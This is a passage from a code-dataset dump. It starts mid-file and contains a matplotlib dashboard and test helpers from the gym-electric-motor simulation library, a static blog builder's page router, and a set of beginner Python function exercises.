self._label = self.state_labels.get(self._state, self._state)
def initialize(self, axis):
# Docstring of superclass
super().initialize(axis)
# Line to plot the state data
self._state_line, = self._axis.plot(self._x_data, self._state_data, **self._state_line_config)
self._lines = [self._state_line]
# If the state is referenced plot also the reference line
if self._referenced:
self._reference_line, = self._axis.plot(self._x_data, self._ref_data, **self._ref_line_config)
# Plot state line in front
axis.lines = axis.lines[::-1]
self._lines.append(self._reference_line)
min_limit = self._limits * self._state_space[0] if self._normalized else self._state_space[0]
max_limit = self._limits * self._state_space[1] if self._normalized else self._state_space[1]
if self._state_space[0] < 0:
self._axis.axhline(min_limit, **self._limit_line_config)
lim = self._axis.axhline(max_limit, **self._limit_line_config)
y_label = self._label
unit_split = y_label.find('/')
if unit_split == -1:
unit_split = len(y_label)
limit_label = y_label[:unit_split] + r'$_{\mathrm{max}}$' + y_label[unit_split:]
if self._referenced:
ref_label = y_label[:unit_split] + r'$^*$' + y_label[unit_split:]
self._axis.legend(
(self._state_line, self._reference_line, lim), (y_label, ref_label, limit_label), loc='upper left',
numpoints=20
)
else:
self._axis.legend((self._state_line, lim), (y_label, limit_label), loc='upper left', numpoints=20)
self._y_data = [self._state_data, self._ref_data]
def on_step_end(self, k, state, reference, reward, done):
super().on_step_end(k, state, reference, reward, done)
# Write the data to the data containers
state_ = state[self._state_idx]
ref = reference[self._state_idx]
idx = self.data_idx
self._x_data[idx] = self._t
self._state_data[idx] = state_ * self._limits
if self._referenced:
self._ref_data[idx] = ref * self._limits
```
#### File: gym_electric_motor/visualization/motor_dashboard.py
```python
from gym_electric_motor.core import ElectricMotorVisualization
from .motor_dashboard_plots import StatePlot, ActionPlot, RewardPlot, TimePlot, EpisodePlot, StepPlot
import matplotlib.pyplot as plt
import gym
class MotorDashboard(ElectricMotorVisualization):
"""A dashboard to plot the GEM states into graphs.
Every MotorDashboard consists of multiple MotorDashboardPlots that are each responsible for the plots in a single
matplotlib axis.
It handles three different types of plots: The TimePlot, EpisodePlot and StepPlot which especially differ in
their x-Axis. The time plots plot every step and have got the time on the x-Axis. The EpisodicPlots plot statistics
over the episodes (e.g. mean reward per step in each episode). The episode number is on their x-Axis. The
StepPlots plot statistics over the last taken steps (e.g. mean reward over the last 1000 steps) and their x-Axis
are the cumulative number of steps.
The StepPlots, EpisodicPlots and TimePlots each are plotted into three separate figures.
The most common TimePlots (i.e to plot the states, actions and rewards) can be plotted by just passing the
corresponding arguments in the constructor. Additional plots (e.g. the MeanEpisodeRewardPlot) have to be
initialized manually and passed to the constructor.
Furthermore, completely custom plots can be defined. They have to derive from the TimePlot, EpisodePlot or
StepPlot base classes.
"""
def __init__(self, state_plots=(), action_plots=(), reward_plot=False, additional_plots=(),
update_interval=1000, step_plot_width=10000, style=None, **__):
"""
Args:
state_plots('all'/iterable(str)): An iterable of state names to be shown. If 'all' all states will be shown.
Default: () (no plotted states)
action_plots('all'/iterable(int)): If action_plots='all', all actions will be plotted. If more than one
action can be applied on the environment it can be selected by its index.
Default: () (no plotted actions).
reward_plot(boolean): Select if the current reward is to be plotted. Default: False
additional_plots(iterable((TimePlot/EpisodePlot/StepPlot))): Additional already instantiated plots
to be shown on the dashboard
update_interval(int > 0): Amount of steps after which the plots are updated. Updating each step reduces the
performance drastically. Default: 1000
step_plot_width(int > 0): Width of the step plots in steps. Default: 10000 steps
(1 second for continuously controlled environments / 0.1 second for discretely controlled environments)
style(string): Select one of the matplotlib-styles. e.g. "dark-background".
Default: None (the already selected style)
"""
# Basic assertions
assert type(reward_plot) is bool
assert all(isinstance(ap, (TimePlot, EpisodePlot, StepPlot)) for ap in additional_plots)
assert type(update_interval) in [int, float]
assert update_interval > 0
assert type(step_plot_width) in [int, float]
assert step_plot_width > 0
assert style in plt.style.available or style is None
super().__init__()
# Select the matplotlib style
if style is not None:
plt.style.use(style)
# List of the opened figures
self._figures = []
# The figures to be opened for the step plots, episodic plots and step plots
self._time_plot_figure = None
self._episodic_plot_figure = None
self._step_plot_figure = None
# Store the input data
self._state_plots = state_plots
self._action_plots = action_plots
self._reward_plot = reward_plot
# Separate the additional plots into StepPlots, EpisodicPlots and StepPlots
self._custom_step_plots = [p for p in additional_plots if isinstance(p, TimePlot)]
self._episodic_plots = [p for p in additional_plots if isinstance(p, EpisodePlot)]
self._step_plots = [p for p in additional_plots if isinstance(p, StepPlot)]
self._time_plots = []
self._update_interval = int(update_interval)
self._step_plot_width = int(step_plot_width)
self._plots = []
self._k = 0
self._update_render = False
def on_reset_begin(self):
"""Called before the environment is reset. All subplots are reset.
"""
for plot in self._plots:
plot.on_reset_begin()
def on_reset_end(self, state, reference):
"""Called after the environment is reset. The initial data is passed.
Args:
state(array(float)): The initial state :math:`s_0`.
reference(array(float)): The initial reference for the first time step :math:`s^*_0`.
"""
for plot in self._plots:
plot.on_reset_end(state, reference)
def on_step_begin(self, k, action):
"""The information about the last environmental step is passed.
Args:
k(int): The current episode step.
action(ndarray(float) / int): The taken action :math:`a_k`.
"""
for plot in self._plots:
plot.on_step_begin(k, action)
def on_step_end(self, k, state, reference, reward, done):
"""The information after the step is passed
Args:
k(int): The current episode step
state(array(float)): The state of the env after the step :math:`s_k`.
reference(array(float)): The reference corresponding to the state :math:`s^*_k`.
reward(float): The reward that has been received for the last action that lead to the current state
:math:`r_{k}`.
done(bool): Flag, that indicates, if the last action lead to a terminal state :math:`t_{k}`.
"""
for plot in self._plots:
plot.on_step_end(k, state, reference, reward, done)
self._k += 1
if self._k % self._update_interval == 0:
self._update_render = True
def render(self):
"""Updates the plots every *update cycle* calls of this method."""
if not (self._time_plot_figure or self._episodic_plot_figure or self._step_plot_figure) \
and len(self._plots) > 0:
self._initialize()
if self._update_render:
self._update()
self._update_render = False
def set_env(self, env):
"""Called during initialization of the environment to interconnect all modules. State names, references,...
might be saved here for later processing
Args:
env(ElectricMotorEnvironment): The environment.
"""
state_names = env.physical_system.state_names
if self._state_plots == 'all':
self._state_plots = state_names
if self._action_plots == 'all':
if type(env.action_space) is gym.spaces.Discrete:
self._action_plots = [0]
elif type(env.action_space) is gym.spaces.Box:
self._action_plots = list(range(env.action_space.shape[0]))
self._time_plots = []
if len(self._state_plots) > 0:
assert all(state in state_names for state in self._state_plots)
for state in self._state_plots:
self._time_plots.append(StatePlot(state))
if len(self._action_plots) > 0:
assert type(env.action_space) in (gym.spaces.Box, gym.spaces.Discrete), \
f'Action space of type {type(env.action_space)} not supported for plotting.'
for action in self._action_plots:
ap = ActionPlot(action)
self._time_plots.append(ap)
if self._reward_plot:
self._reward_plot = RewardPlot()
self._time_plots.append(self._reward_plot)
self._plots = self._time_plots + self._episodic_plots + self._step_plots
for step_plot in self._time_plots:
step_plot.set_width(self._step_plot_width)
for plot in self._plots:
plot.set_env(env)
def _initialize(self):
"""Called with first render() call to setup the figures and plots."""
plt.close()
self._figures = []
# create separate figures for time based, step and episode based plots
if len(self._time_plots) > 0:
self._time_plot_figure, axes_step = plt.subplots(len(self._time_plots), sharex=True)
self._time_plot_figure.canvas.set_window_title('Time Plots')
axes_step = [axes_step] if len(self._time_plots) == 1 else axes_step
self._time_plot_figure.subplots_adjust(wspace=0.0, hspace=0.2)
axes_step[-1].set_xlabel('$t$/s')
self._figures.append(self._time_plot_figure)
for plot, axis in zip(self._time_plots, axes_step):
plot.initialize(axis)
if len(self._episodic_plots) > 0:
self._episodic_plot_figure, axes_ep = plt.subplots(len(self._episodic_plots), sharex=True)
axes_ep = [axes_ep] if len(self._episodic_plots) == 1 else axes_ep
self._episodic_plot_figure.subplots_adjust(wspace=0.0, hspace=0.02)
self._episodic_plot_figure.canvas.set_window_title('Episodic Plots')
axes_ep[-1].set_xlabel('Episode No')
self._figures.append(self._episodic_plot_figure)
for plot, axis in zip(self._episodic_plots, axes_ep):
plot.initialize(axis)
if len(self._step_plots) > 0:
self._step_plot_figure, axes_int = plt.subplots(len(self._step_plots), sharex=True)
axes_int = [axes_int] if len(self._step_plots) == 1 else axes_int
self._step_plot_figure.canvas.set_window_title('Step Plots')
self._step_plot_figure.subplots_adjust(wspace=0.0, hspace=0.02)
axes_int[-1].set_xlabel('Cumulative Steps')
self._figures.append(self._step_plot_figure)
for plot, axis in zip(self._step_plots, axes_int):
plot.initialize(axis)
plt.pause(0.1)
def _update(self):
"""Called every *update cycle* steps to refresh the figure."""
for plot in self._plots:
plot.render()
for fig in self._figures:
fig.canvas.draw()
fig.canvas.flush_events()
```
#### File: gym-electric-motor/tests/testing_utils.py
```python
from .conf import *
from gym_electric_motor.physical_systems import *
from gym_electric_motor.utils import make_module, set_state_array
from gym_electric_motor import ReferenceGenerator, RewardFunction, PhysicalSystem, ElectricMotorVisualization, \
ConstraintMonitor
from gym_electric_motor.physical_systems import PowerElectronicConverter, MechanicalLoad, ElectricMotor, OdeSolver, \
VoltageSupply, NoiseGenerator
import gym_electric_motor.physical_systems.converters as cv
from gym_electric_motor.physical_systems.physical_systems import SCMLSystem
import numpy as np
from gym.spaces import Box, Discrete
from scipy.integrate import ode
from tests.conf import system, jacobian, permex_motor_parameter
from gym_electric_motor.utils import instantiate
from gym_electric_motor.core import Callback
# region first version
def setup_physical_system(motor_type, converter_type, subconverters=None, three_phase=False):
"""
Function to set up a physical system with test parameters
:param motor_type: motor name (string)
:param converter_type: converter name (string)
:param three_phase: if True, than a synchronous motor system will be instantiated
:return: instantiated physical system
"""
# get test parameter
tau = converter_parameter['tau']
u_sup = test_motor_parameter[motor_type]['motor_parameter']['u_sup']
motor_parameter = test_motor_parameter[motor_type]['motor_parameter'] # dict
nominal_values = test_motor_parameter[motor_type]['nominal_values'] # dict
limit_values = test_motor_parameter[motor_type]['limit_values'] # dict
# setup load
load = PolynomialStaticLoad(load_parameter=load_parameter['parameter'])
# setup voltage supply
voltage_supply = IdealVoltageSupply(u_sup)
# setup converter
if motor_type == 'DcExtEx':
if 'Disc' in converter_type:
double_converter = 'Disc-Multi'
else:
double_converter = 'Cont-Multi'
converter = make_module(PowerElectronicConverter, double_converter,
subconverters=[converter_type, converter_type],
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
else:
converter = make_module(PowerElectronicConverter, converter_type,
subconverters=subconverters,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
# setup motor
motor = make_module(ElectricMotor, motor_type, motor_parameter=motor_parameter, nominal_values=nominal_values,
limit_values=limit_values)
# setup solver
solver = ScipySolveIvpSolver(method='RK45')
# combine all modules to a physical system
if three_phase:
if motor_type == "SCIM":
physical_system = SquirrelCageInductionMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
elif motor_type == "DFIM":
physical_system = DoublyFedInductionMotor(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
else:
physical_system = SynchronousMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
else:
physical_system = DcMotorSystem(converter=converter, motor=motor, ode_solver=solver,
supply=voltage_supply, load=load, tau=tau)
return physical_system
def setup_reference_generator(reference_type, physical_system, reference_state='omega'):
"""
Function to setup the reference generator
:param reference_type: name of reference generator
:param physical_system: instantiated physical system
:param reference_state: referenced state name (string)
:return: instantiated reference generator
"""
reference_generator = make_module(ReferenceGenerator, reference_type, reference_state=reference_state)
reference_generator.set_modules(physical_system)
reference_generator.reset()
return reference_generator
def setup_reward_function(reward_function_type, physical_system, reference_generator, reward_weights, observed_states):
reward_function = make_module(RewardFunction, reward_function_type, observed_states=observed_states,
reward_weights=reward_weights)
reward_function.set_modules(physical_system, reference_generator)
return reward_function
def setup_dc_converter(conv, motor_type, subconverters=None):
"""
This function initializes the converter.
It differentiates between single and double converter and can be used for discrete and continuous converters.
:param conv: converter name (string)
:param motor_type: motor name (string)
:return: initialized converter
"""
if motor_type == 'DcExtEx':
# setup double converter
if 'Disc' in conv:
double_converter = 'Disc-Multi'
else:
double_converter = 'Cont-Multi'
converter = make_module(PowerElectronicConverter, double_converter,
interlocking_time=converter_parameter['interlocking_time'],
dead_time=converter_parameter['dead_time'],
subconverters=[make_module(PowerElectronicConverter, conv,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time']),
make_module(PowerElectronicConverter, conv,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])])
else:
# setup single converter
converter = make_module(PowerElectronicConverter, conv,
subconverters=subconverters,
tau=converter_parameter['tau'],
dead_time=converter_parameter['dead_time'],
interlocking_time=converter_parameter['interlocking_time'])
return converter
# endregion
# region second version
instantiate_dict = {}
def mock_instantiate(superclass, key, **kwargs):
# Instantiate the object and log the passed and returned values to validate correct function calls
instantiate_dict[superclass] = {}
instantiate_dict[superclass]['key'] = key
inst = instantiate(superclass, key, **kwargs)
instantiate_dict[superclass]['instance'] = inst
return inst
class DummyReferenceGenerator(ReferenceGenerator):
reference_space = Box(0, 1, shape=(1,))
_reset_counter = 0
def __init__(self, reference_observation=np.array([1]), reference_state='dummy_state_0', **kwargs):
self.kwargs = kwargs
self.closed = False
self.physical_system = None
self.get_reference_state = None
self.get_reference_obs_state = None
self.trajectory = np.sin(np.linspace(0, 50, 100))
self._reference_state = reference_state
self.reference_observation = reference_observation
self.reference_array = None
self.kwargs = kwargs
def set_modules(self, physical_system):
self.physical_system = physical_system
self.reference_array = np.ones_like(physical_system.state_names).astype(float)
super().set_modules(physical_system)
self._referenced_states = set_state_array(
{self._reference_state: 1}, physical_system.state_names
).astype(bool)
def reset(self, initial_state=None, initial_reference=None):
self._reset_counter += 1
res = super().reset(initial_state, initial_reference)
return res[0], res[1], self.trajectory
def get_reference(self, state, *_, **__):
self.get_reference_state = state
return self.reference_array
def get_reference_observation(self, state, *_, **__):
self.get_reference_obs_state = state
return self.reference_observation
def close(self):
self.closed = True
super().close()
class DummyRewardFunction(RewardFunction):
def __init__(self, **kwargs):
self.last_state = None
self.last_reference = None
self.last_action = None
self.last_time_step = None
self.closed = False
self.done = False
self.kwargs = kwargs
super().__init__()
def reset(self, initial_state=None, initial_reference=None):
self.last_state = initial_state
self.last_reference = initial_reference
super().reset(initial_state, initial_reference)
def reward(self, state, reference, k=None, action=None, violation_degree=0.0):
self.last_state = state
self.last_reference = reference
self.last_action = action
self.last_time_step = k
return -1 if violation_degree == 1 else 1
def close(self):
self.closed = True
super().close()
def _limit_violation_reward(self, state):
pass
def _reward(self, state, reference, action):
pass
class DummyPhysicalSystem(PhysicalSystem):
@property
def limits(self):
"""
Returns:
ndarray(float): An array containing the maximum allowed physical values for each state variable.
"""
return self._limits
@property
def nominal_state(self):
"""
Returns:
ndarray(float): An array containing the nominal values for each state variable.
"""
return self._nominal_values
def __init__(self, state_length=1, state_names='dummy_state', **kwargs):
super().__init__(
Box(-1, 1, shape=(1,)), Box(-1, 1, shape=(state_length,)),
[f'{state_names}_{i}' for i in range(state_length)], 1
)
self._limits = np.array([10 * (i + 1) for i in range(state_length)])
self._nominal_values = np.array([(i + 1) for i in range(state_length)])
self.action = None
self.state = None
self.closed = False
self.kwargs = kwargs
def reset(self, initial_state=None):
self.state = np.array([0] * len(self._state_names))
return self.state
def simulate(self, action):
self.action = action
self.state = np.array([action * (i + 1) for i in range(len(self._state_names))])
return self.state
def close(self):
self.closed = True
super().close()
class DummyVisualization(ElectricMotorVisualization):
def __init__(self, **kwargs):
self.closed = False
self.state = None
self.reference = None
self.reward = None
self.reference_trajectory = None
self.physical_system = None
self.reference_generator = None
self.reward_function = None
self.kwargs = kwargs
super().__init__()
def step(self, state, reference, reward, *_, **__):
self.state = state
self.reference = reference
self.reward = reward
def reset(self, reference_trajectories=None, *_, **__):
self.reference_trajectory = reference_trajectories
def set_modules(self, physical_system, reference_generator, reward_function):
self.physical_system = physical_system
self.reference_generator = reference_generator
self.reward_function = reward_function
class DummyVoltageSupply(VoltageSupply):
def __init__(self, u_nominal=560, tau=1e-4, **kwargs):
super().__init__(u_nominal, tau=tau)
self.i_sup = None
self.t = None
self.reset_counter = 0
self.args = None
self.kwargs = kwargs
self.get_voltage_counter = 0
def reset(self):
self.reset_counter += 1
return super().reset()
def get_voltage(self, i_sup, t, *args, **kwargs):
self.get_voltage_counter += 1
self.i_sup = i_sup
self.t = t
self.args = args
self.kwargs = kwargs
return [self._u_nominal]
class DummyConverter(PowerElectronicConverter):
voltages = Box(0, 1, shape=(1,))
currents = Box(-1, 1, shape=(1,))
action_space = Discrete(4)
def __init__(self, tau=2E-4, dead_time=False, interlocking_time=0, action_space=None, voltages=None, currents=None, **kwargs):
super().__init__(tau, dead_time, interlocking_time)
self.action_space = action_space or self.action_space
self.voltages = voltages or self.voltages
self.currents = currents or self.currents
self.reset_counter = 0
self.convert_counter = 0
self.switching_times = [tau]
self.action = None
self.action_set_time = None
self.i_out = None
self.last_i_out = None
self.t = None
self.kwargs = kwargs
self.u_in = None
def i_sup(self, i_out):
self.last_i_out = i_out
return i_out[0]
def set_switching_times(self, switching_times):
self.switching_times = switching_times
def set_action(self, action, t):
self.action_set_time = t
self.action = action
return [t + self._tau / 2, t + self._tau]
def reset(self):
self.reset_counter += 1
return [0.0] * self.voltages.shape[0]
def convert(self, i_out, t):
self.i_out = i_out
self.t = t
self.convert_counter += 1
self.u_in = [self.action] if type(self.action_space) is Discrete else self.action
return self.u_in
class DummyElectricMotor(ElectricMotor):
# defined test values
_default_motor_parameter = permex_motor_parameter['motor_parameter']
_default_limits = dict(omega=16, torque=26, u=15, i=26, i_0=26, i_1=21, u_0=15)
_default_nominal_values = dict(omega=14, torque=20, u=15, i=22, i_0=22, i_1=20)
HAS_JACOBIAN = True
electrical_jac_return = None
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_0', 'i_1']
VOLTAGES = ['u_0']
def __init__(self, tau=1e-5, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
self.u_in = None
super().__init__(tau=tau, **kwargs)
def electrical_ode(self, state, u_in, omega, *_):
self.u_in = u_in
return state - u_in
def reset(self, state_space, state_positions):
self.reset_counter += 1
return super().reset(state_space, state_positions)
def torque(self, currents):
return np.prod(currents)
def i_in(self, state):
return [np.sum(state)]
def electrical_jacobian(self, state, u_in, omega, *_):
return self.electrical_jac_return
class PowerElectronicConverterWrapper(cv.PowerElectronicConverter):
def __init__(self, subconverter, **kwargs):
super().__init__(**kwargs)
self._converter = subconverter
self.action_space = self._converter.action_space
self.currents = self._converter.currents
self.voltages = self._converter.voltages
self.reset_calls = 0
self.set_action_calls = 0
self.last_action = None
self.last_t = None
self.last_i_out = None
self.last_u = None
self.last_i_sup = None
def reset(self):
self.reset_calls += 1
return self._converter.reset()
def set_action(self, action, t):
self.last_action = action
self.last_t = t
return self._converter.set_action(action, t)
def convert(self, i_out, t):
self.last_i_out = i_out
self.last_t = t
self.last_u = self._converter.convert(i_out, t)
return self.last_u
def i_sup(self, i_out):
self.last_i_out = i_out
self.last_i_sup = self._converter.i_sup(i_out)
return self.last_i_sup
class DummyScipyOdeSolver(ode):
"""
Dummy class for ScipyOdeSolver
"""
# defined test values
_kwargs = {'nsteps': 5}
_integrator = 'dop853'
_y = np.zeros(2)
_y_init = np.array([1, 6])
_t = 0
_tau = 1e-3
_t_init = 0.1
jac = None
# counter
_init_counter = 0
_set_integrator_counter = 0
_set_initial_value_counter = 0
_set_f_params_counter = 0
_set_jac_params_counter = 0
_integrate_counter = 0
def __init__(self, system_equation, jacobian_):
self._init_counter += 1
assert system_equation == system
assert jacobian_ == jacobian
super().__init__(system_equation, jacobian_)
def set_integrator(self, integrator, **args):
self._set_integrator_counter += 1
assert integrator == self._integrator
assert args == self._kwargs
return super().set_integrator(integrator, **args)
def set_initial_value(self, y, t=0.0):
self._set_initial_value_counter += 1
assert all(y == self._y_init)
assert t == self._t_init
def set_f_params(self, *args):
self._set_f_params_counter += 1
assert args == (2,)
super().set_f_params(2)
def set_jac_params(self, *args):
self._set_jac_params_counter += 1
assert args == (2,)
super().set_jac_params(*args)
def integrate(self, t, *_):
self._integrate_counter += 1
assert t == self._t_init + self._tau
return self._y_init * 2
class DummyLoad(MechanicalLoad):
"""
dummy class for mechanical load
"""
state_names = ['omega', 'position']
limits = dict(omega=15, position=10)
nominal_values = dict(omega=15, position=10)
mechanical_state = None
t = None
mechanical_ode_return = None
mechanical_jac_return = None
omega_range = None
HAS_JACOBIAN = True
def __init__(self, tau=1e-4, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
super().__init__(tau=tau, **kwargs)
def reset(self, state_space, state_positions, nominal_state, *_, **__):
self.reset_counter += 1
return np.zeros(2)
def mechanical_ode(self, t, mechanical_state, torque):
self.mechanical_state = mechanical_state
self.t = t
self.mechanical_ode_return = np.array([torque, -torque])
return self.mechanical_ode_return
def mechanical_jacobian(self, t, mechanical_state, torque):
self.mechanical_state = mechanical_state
self.t = t
self.mechanical_ode_return = np.array([torque, -torque])
return self.mechanical_jac_return
def get_state_space(self, omega_range):
self.omega_range = omega_range
return {'omega': 0, 'position': -1}, {'omega': 1, 'position': -1}
class DummyNoise(NoiseGenerator):
"""
dummy class for noise generator
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
self.reset_counter = 0
super().__init__()
def reset(self):
return np.ones_like(self._state_variables, dtype=float) * 0.36
def noise(self, *_, **__):
return np.ones_like(self._state_variables, dtype=float) * 0.42
class DummyOdeSolver(OdeSolver):
"""
Dummy class for ode solver
"""
def __init__(self, **kwargs):
self.kwargs = kwargs
super().__init__()
def integrate(self, t):
self.last_y = self._y
self._y = self._y + t - self._t
self._t = t
return self._y
class DummyConstraint(Constraint):
def __init__(self, violation_degree=0.0):
super().__init__()
self.modules_set = False
self.violation_degree = violation_degree
def __call__(self, state):
return self.violation_degree
def set_modules(self, ps):
super().set_modules(ps)
self.modules_set = True
class DummyConstraintMonitor(ConstraintMonitor):
def __init__(self, no_of_dummy_constraints=1):
constraints = [DummyConstraint() for _ in range(no_of_dummy_constraints)]
super().__init__(additional_constraints=constraints)
class DummySCMLSystem(SCMLSystem):
"""
dummy class for SCMLSystem
"""
# defined test values
OMEGA_IDX = 0
TORQUE_IDX = 1
CURRENTS_IDX = []
VOLTAGES_IDX = []
U_SUP_IDX = -1
_limits = {}
_nominal_state = {}
_supply = None
_converter = None
_electrical_motor = None
_mechanical_load = None
_state_names = ['omega_me', 'torque', 'u', 'i', 'u_sup']
_state_length = 5
# counter
_set_limits_counter = 0
_set_nominal_state_counter = 0
def _set_limits(self):
self._set_limits_counter += 1
def _set_nominal_state(self):
self._set_nominal_state_counter += 1
def _build_state_space(self, state_names):
assert state_names == self._state_names
return None
def _build_state_names(self):
return self._state_names
def _set_indices(self):
pass
def simulate(self, action, *_, **__):
return np.ones(self._state_length) * 0.46
def _system_equation(self, t, state, u_in, **__):
return np.ones(self._state_length) * 0.87
def reset(self, *_):
return np.ones(self._state_length) * 0.12
def _forward_transform(self, quantities, motor_state):
return quantities
def _build_state(self, motor_state, torque, u_in, u_sup):
pass
def _action_transformation(self, action):
return action
class DummyRandom:
_expected_low = None
_expected_high = None
_expected_left = None
_expected_mode = None
_expected_right = None
_expected_values = None
_expected_probabilities = None
_expected_loc = None
_expected_scale = None
_expected_size = None
# counter
_monkey_random_rand_counter = 0
_monkey_random_triangular_counter = 0
_monkey_random_randint_counter = 0
_monkey_random_choice_counter = 0
_monkey_random_normal_counter = 0
def __init__(self, exp_low=None, exp_high=None, exp_left=None, exp_right=None, exp_mode=None, exp_values=None,
exp_probabilities=None, exp_loc=None, exp_scale=None, exp_size=None):
"""
set expected values
:param exp_low: expected lower value
:param exp_high: expected upper value
:param exp_mode: expected mode value
:param exp_right: expected right value
:param exp_left: expected left value
:param exp_values: expected values for choice
:param exp_probabilities: expected probabilities for choice
:param exp_loc: expected loc value
:param exp_scale: expected scale value
:param exp_size: expected size value
"""
self._expected_low = exp_low
self._expected_high = exp_high
self._expected_mode = exp_mode
self._expected_left = exp_left
self._expected_right = exp_right
self._expected_values = exp_values
self._expected_probabilities = exp_probabilities
self._expected_loc = exp_loc
self._expected_scale = exp_scale
self._expected_size = exp_size
def monkey_random_rand(self):
self._monkey_random_rand_counter += 1
"""
mock function for np.random.rand()
:return:
"""
return 0.25
def monkey_random_triangular(self, left, mode, right):
self._monkey_random_triangular_counter += 1
if self._expected_left is not None:
assert left == self._expected_left
if self._expected_high is not None:
assert right == self._expected_right
if self._expected_mode is not None:
assert mode == self._expected_mode
"""
mock function for np.random.triangular()
:return:
"""
return 0.45
def monkey_random_randint(self, low, high):
if self._expected_low is not None:
assert low == self._expected_low
if self._expected_high is not None:
assert high == self._expected_high
self._monkey_random_randint_counter += 1
"""
mock function for random.randint()
:param low:
:param high:
:return:
"""
return 7
def monkey_random_choice(self, a, p):
self._monkey_random_choice_counter += 1
assert len(a) == len(p)
if self._expected_values is not None:
assert a == self._expected_values
if self._expected_probabilities is not None:
assert p == self._expected_probabilities
return a[0]
def monkey_random_normal(self, loc=0, scale=1.0, size=None):
if self._expected_loc is not None:
assert loc == self._expected_loc
if self._expected_scale is not None:
assert scale == self._expected_scale
if self._expected_size is not None:
assert size == self._expected_size
else:
size = 1
self._monkey_random_normal_counter += 1
result = np.array([0.1, -0.2, 0.6, 0.1, -0.5, -0.3, -1.7, 0.1, -0.2, 0.4])
return result[:size]
class DummyElectricMotorEnvironment(ElectricMotorEnvironment):
"""Dummy environment to test pre implemented callbacks. Extend for further testing cases"""
def __init__(self, reference_generator=None, callbacks=(), **kwargs):
reference_generator = reference_generator or DummyReferenceGenerator()
super().__init__(DummyPhysicalSystem(), reference_generator, DummyRewardFunction(), callbacks=callbacks)
def step(self):
self._call_callbacks('on_step_begin', 0, 0)
self._call_callbacks('on_step_end', 0, 0, 0, 0, 0)
def reset(self):
self._call_callbacks('on_reset_begin')
self._call_callbacks('on_reset_end', 0, 0)
def close(self):
self._call_callbacks(self._callbacks, 'on_close')
class DummyCallback(Callback):
def __init__(self):
super().__init__()
self.reset_begin = 0
self.reset_end = 0
self.step_begin = 0
self.step_end = 0
self.close = 0
def on_reset_begin(self):
self.reset_begin += 1
def on_reset_end(self, *_):
self.reset_end += 1
def on_step_begin(self, *_):
self.step_begin += 1
def on_step_end(self, *_):
self.step_end += 1
def on_close(self):
self.close += 1
# endregion
``` |
{
"source": "54wedge/blog_builder",
"score": 2
} |
#### File: blog_builder/tool/router.py
```python
import tool.utils as utils
from tool.template import _Template
from tool.utils import config
from tool.utils import content_path
import tool.module as module
class _Router():
def __init__(self,post_list):
self.post_list = post_list
self.home = _Home(post_list)
self.archive = _Archive(post_list)
self.category_list = _Category(post_list).list()
self.tag_list = _Tag(post_list).list()
class _Home:
def __init__(self,post_list):
self.post_list = post_list[0:config['Site']['Home_Page_Items']]
self.path = utils.join_path(config['Directory']['Output'], 'index.html')
self.content = self.build()
def build(self):
list_home = module.home_module(self.post_list)
home_page = _Template('home')
home_page.replace('{$Page_Title$}', 'Home')
home_page.replace('{&Home_module&}',str(list_home))
home_page.replace('../','./')
return home_page.str()
class _Archive():
def __init__(self,post_list):
self.post_list = post_list
self.path = utils.join_path(config['Directory']['Output'], 'Archive/index.html')
self.content = self.build()
def build(self):
list_archive = module.archive_module(self.post_list)
archive_page = _Template('archive')
archive_page.replace('{$Page_Title$}', 'Archive')
archive_page.replace('{&Archive_module&}',str(list_archive))
return archive_page.str()
class _Category:
def __init__(self,post_list):
self.category_dict = {}
for post in post_list:
try:
self.category_dict[post.meta.category].append(post)
except KeyError:
self.category_dict[post.meta.category] = []
self.category_dict[post.meta.category].append(post)
def build(self, category_list, category_name):
list_category = module.post_module(category_list)
category_page = _Template('category')
category_page.replace('{$Page_Title$}', category_name)
category_page.replace('{$Category$}', category_name)
category_page.replace('{&Post_module&}',str(list_category))
category_page.replace('../','../../')
return category_page.str()
def list(self):
list = []
for category_name in self.category_dict.keys():
category_list = self.category_dict[category_name]
content = self.build(category_list, category_name)
path = utils.join_path(config['Directory']['Output'], 'category', category_name, 'index.html')
struct = content_path(content, path)
list.append(struct)
return list
class _Tag:
def __init__(self,post_list):
self.tag_dict = {}
for post in post_list:
for meta_tag in post.meta.tag:
try:
self.tag_dict[meta_tag].append(post)
except KeyError:
self.tag_dict[meta_tag] = []
self.tag_dict[meta_tag].append(post)
def build(self, tag_list, tag_name):
list_tag = module.post_module(tag_list)
tag_page = _Template('tag')
tag_page.replace('{$Page_Title$}', '#' + tag_name)
tag_page.replace('{$Tag$}', tag_name)
tag_page.replace('{&Post_module&}',str(list_tag))
tag_page.replace('../','../../')
return tag_page.str()
def list(self):
list = []
for tag_name in self.tag_dict.keys():
tag_list = self.tag_dict[tag_name]
content = self.build(tag_list, tag_name)
path = utils.join_path(config['Directory']['Output'], 'tag', tag_name, 'index.html')
struct = content_path(content, path)
list.append(struct)
return list
``` |
{
"source": "550872569/byte_of_python",
"score": 4
} |
#### File: python/def_param_fun/def_param_fun.py
```python
import math
def my_abs(x):
if not isinstance(x, (int, float)):
return None
if x >= 0:
return x
else:
return -x
# print(my_abs(-99))
# 99
# no result \ return function
def printInput(x):
print(x)
# print(printInput('10'))
# 10
# None
# print(my_abs('A'))
# None
def replaceNumber(a, b):
return b, a
# print(replaceNumber(12, 99))
# (99, 12)
# ax2+bx+c=
def sum(a, b, c):
if not isinstance(a, (int, float)):
return None
if not isinstance(b, (int, float)):
return None
if not isinstance(c, (int, float)):
return None
return a+b+c
# print(sum(12, 23, 34))
# 69
def power(x, n):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
# print(power(5, 2))
# 25
def powerDefault(x, n = 2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
